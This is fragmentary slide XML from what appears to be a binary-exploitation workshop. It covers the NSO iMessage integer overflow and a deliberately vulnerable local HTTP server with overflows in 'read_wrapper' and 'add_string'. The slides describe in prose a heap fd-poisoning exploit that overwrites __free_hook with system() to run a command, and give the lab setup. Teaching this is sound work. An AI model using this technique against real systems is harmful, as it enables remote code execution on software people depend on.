              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0076E60-A513-B424-F73A-1293263E6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size of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>segments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>within a PDF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E407C9-849C-E7D8-22E4-F4253510D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0" y="2025887"/>
            <a:ext cx="7912100" cy="2616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229958-E80D-550D-3FDD-7E8E434E73A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1344063" y="3596529"/>
            <a:ext cx="9019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5015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2094-2CE1-D9D2-4C2F-805FE1E6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NSO iMessage Vulnerability – 2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Adding all segments in a PDF together - https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0076E60-A513-B424-F73A-1293263E6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473486" cy="885214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> based upon this – too small!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Overflowed size used in allocation: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E51477-BFFE-31E4-78F3-65E1204D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698964"/>
            <a:ext cx="8001000" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Buffer overflow occurs: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A592471-A074-CE03-25C1-89D3A93EE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2895600"/>
            <a:ext cx="6769100" cy="2247900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2" descr="Adding all segments in a PDF together - https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{631793FB-63B5-1A31-6D29-782AFB658C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2247900"/>
            <a:ext cx="7886700" cy="462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Write to this buffer with user controlled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E415DE-0DFB-B1E4-4A26-B7E9001373F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2025181"/>
            <a:ext cx="9019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291FEB-6B0B-DF9E-0162-F90F5F85566D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480874" y="2025181"/>
            <a:ext cx="9019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31F68-799D-3EA4-8CF7-3055281C0186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420862" y="4814249"/>
            <a:ext cx="123991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469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1649-6195-BC46-85D2-D74D4D94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Headers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2B4A-5F20-2547-95E5-062C01562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87" y="1124489"/>
            <a:ext cx="8684026" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization: Authentication information for a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: Host name and port number of the request being sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Request-Id: Specifies the ID to use internally and on the response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49F6A5-CC2C-8E4B-B05F-29E7EC85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653293"/>
            <a:ext cx="6881859" cy="225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3861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D983-E43B-DDF1-45CE-4E9420A7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Integer Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>read_wrapper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CDB1-050A-A5A3-11A4-B0C73AE3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validation of overflow – common mistake to make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Trying to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0"/>
              <a:t>double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> the size of the allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="If size isn't big enough double it code in 'read_wrapper'">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F567B54B-A24F-77C7-260B-CDA929BF7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64" y="2404545"/>
            <a:ext cx="7300329" cy="219408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72B99-369C-08A7-BDD0-5C184CC2BA72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2167631" y="2762028"/>
            <a:ext cx="9019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2225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A34E-7787-26ED-0B31-D86F317D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Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string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008F7-80A7-C159-1057-88707D07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add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() – used for adding the response data together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically resizes the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE536E7F-D427-18F9-964F-8B568D1D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96" y="1999264"/>
            <a:ext cx="7810500" cy="2565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6ED52B-AEED-1E45-D2B8-5B8853D337B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295095" y="2664373"/>
            <a:ext cx="48102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572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A34E-7787-26ED-0B31-D86F317D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Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string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008F7-80A7-C159-1057-88707D07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994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() – used for adding the response data together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically resizes the buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Function signature for 'add_string()'">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D11CABC-E17E-95A7-ACBF-6E2E6D14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8996"/>
            <a:ext cx="9144000" cy="5100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6ED52B-AEED-1E45-D2B8-5B8853D337B9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6258757" y="2374008"/>
            <a:ext cx="2885243" cy="10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A586A0-6185-E671-1B0A-24C93057AC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408188" y="278521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unsigned short: 2^16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440142A7-3844-FA30-08EE-4A7E6D8D7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95" b="60273"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="446288" y="3256940"/>
            <a:ext cx="7810500" cy="6601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D003AB-59A4-0231-7D46-88F2FF36DDB4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3277339" y="3587003"/>
            <a:ext cx="497944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9831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1C8-10E9-E840-14A1-29C862AA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Even Exploitable?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AEA77A-2462-D594-D5E0-631257EA8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1597982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large initial string for overflow? Nope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>huge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> string = crash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Small buffer being copied into a LARGE BUFFER">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{442DAE13-1E0D-1D45-D404-0C1AED15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739" y="2137452"/>
            <a:ext cx="3779052" cy="2920177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0EA4EA7D-8721-2BB1-6B34-243A8771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35532"/>
            <a:ext cx="4456651" cy="303862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D46A86-1738-948E-126C-FD3CF9164017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5228948" y="2698812"/>
            <a:ext cx="3169328" cy="15358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B14157-0070-A73B-8EF3-6503937A9150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5215661" y="2698812"/>
            <a:ext cx="3031694" cy="15358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67DA530-69EF-4065-A1DF-E08490E10A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446853" y="2698812"/>
            <a:ext cx="1029810" cy="72287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757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1C8-10E9-E840-14A1-29C862AA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4456651" cy="1075559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Is This Even Exploitable?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AEA77A-2462-D594-D5E0-631257EA8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44" y="1236541"/>
            <a:ext cx="4943258" cy="2032904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large initial string for overflow? Nope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>huge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> string = crash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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0EA4EA7D-8721-2BB1-6B34-243A8771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49" y="0"/>
            <a:ext cx="4456651" cy="303862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D46A86-1738-948E-126C-FD3CF9164017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5331010" y="639397"/>
            <a:ext cx="3169328" cy="15358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B14157-0070-A73B-8EF3-6503937A9150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5366582" y="662822"/>
            <a:ext cx="3031694" cy="15358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Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A5B8EE-E5FB-2E3F-A393-8855CB2E10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1" t="13426" b="32935"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412995" y="2929631"/>
            <a:ext cx="8359973" cy="159798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A8A0F1-60AD-4053-15C9-5600F431F90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4049698" y="3703060"/>
            <a:ext cx="176517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FD181B-4E2F-4134-F8B0-5A5B357C2B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101919" y="4527613"/>
            <a:ext cx="2413431" cy="203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5DD5945-5CC9-E97D-0928-BF1E2B36E400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484306" y="595580"/>
            <a:ext cx="1029810" cy="72287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848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1C8-10E9-E840-14A1-29C862AA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4254068" cy="867586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Is This Even Exploitable?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691A22D7-4136-CF17-D130-F7F80F640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1" t="13426" b="32935"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412995" y="2929631"/>
            <a:ext cx="8359973" cy="15979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E65931-2A09-EFB4-5A10-E9C17D246FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4049698" y="3703060"/>
            <a:ext cx="176517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F4F2BA-C19B-2667-606D-14C174CC8933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101919" y="4527613"/>
            <a:ext cx="2413431" cy="203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AEA77A-2462-D594-D5E0-631257EA8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186224" cy="1444515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small initial string for overflow? Yes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Slightly Bigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> string = Buffer Overflow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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Reasonable sized buffer overflow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76EF192A-773B-65F2-C6AC-2E5F296D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373" y="92013"/>
            <a:ext cx="3405142" cy="283761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540E442-C8E9-582C-6024-D8DFCBCAE73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6945944" y="674244"/>
            <a:ext cx="1029810" cy="72287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05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315B-FCC1-E894-F25B-26F2614F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Exploit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668F1A-5EF2-48A3-7495-F9822C3241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580545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67472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9ECC-2EB2-903B-8CEB-86A5E6E1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Many Ways to Exploit This!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733D5A-E339-BD85-46F0-FB42EBF6BF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92880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94218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E36D-790F-0239-56AA-A9B35501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Fd Poison – Most Straight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1D4D-B097-F59A-DEA0-905E03C76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Corrupt fd pointer in following chunk: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point ‘fd’ to be at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__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free_hook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/>
              <a:t>Write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__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free_hook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/>
              <a:t>with ‘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system()’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free chunk with data for the ‘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command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ in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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5D04B9-DE3C-CA06-B8A2-424F6582D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46" b="36278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16718" y="4585170"/>
            <a:ext cx="8995486" cy="521784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Free hook and command - first parameter lines up perfectly. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C20F7CF7-0CEF-AF2C-737F-28BD27941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06" y="3760299"/>
            <a:ext cx="5835774" cy="7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109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5351-4F8E-EBF7-FF63-FC1D32DA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Exploitable!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097989-6E55-6390-617C-2D1AB74DB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586784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352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4C90-DDEC-754E-A2D9-3EE80F9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Supported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52FC-4C57-3D4D-A1D8-DB47AC39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X-Override-Path: Dynamically change the PATH of the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Override-Host: Dynamically change the HOST of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: Keep the connection open and drop headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Length: Length of the body of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: The TYPE of the request of the body. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization: Authenticating as a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-Agent: The user information for the request (Chrome, Firefox, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: The hostname of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin: The origin of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Request-Id: The request ID used for the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom handling - callback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99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16EF-9DA6-C49A-E405-7A942E9B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EEFD5-1B0D-3581-A63C-587ED4AE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4C90-DDEC-754E-A2D9-3EE80F9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Other Supported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52FC-4C57-3D4D-A1D8-DB47AC39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Content-Types: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>plain/text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All HTTP Verbs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query parameters in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL decoding in path/body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Renders in browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>🔥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4C90-DDEC-754E-A2D9-3EE80F9C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List of Non-Supported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52FC-4C57-3D4D-A1D8-DB47AC393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JSON and other Content Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complicated authorization headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anything else not mentioned before…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="No patrick Internet explorer is not supported - no patrick mayonnaise is not  an instrument | Meme Generator">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1FAD5E-0D22-9F47-A336-B9F8EF9DD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0498" y="1369219"/>
            <a:ext cx="3263504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95925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5626-9164-5D40-BAA6-C47DA800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F3BD-F228-9046-9DC2-741CA060E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8515350" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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./server # Start the server &lt;-- In /final/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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src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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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gdb</a:t>
            </a:r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./server # Works for debugging &lt;-- use this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>127.0.0.1 8081</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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1"/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828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5626-9164-5D40-BAA6-C47DA800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Interact with the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F3BD-F228-9046-9DC2-741CA060E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01" y="939998"/>
            <a:ext cx="7886700" cy="3929656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write simply Python </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to print a string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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pipe data to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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24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/>
              <a:t>from Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400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Pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> works as </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>well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python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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http_test.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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| </a:t>
            </a:r>
            <a:r>
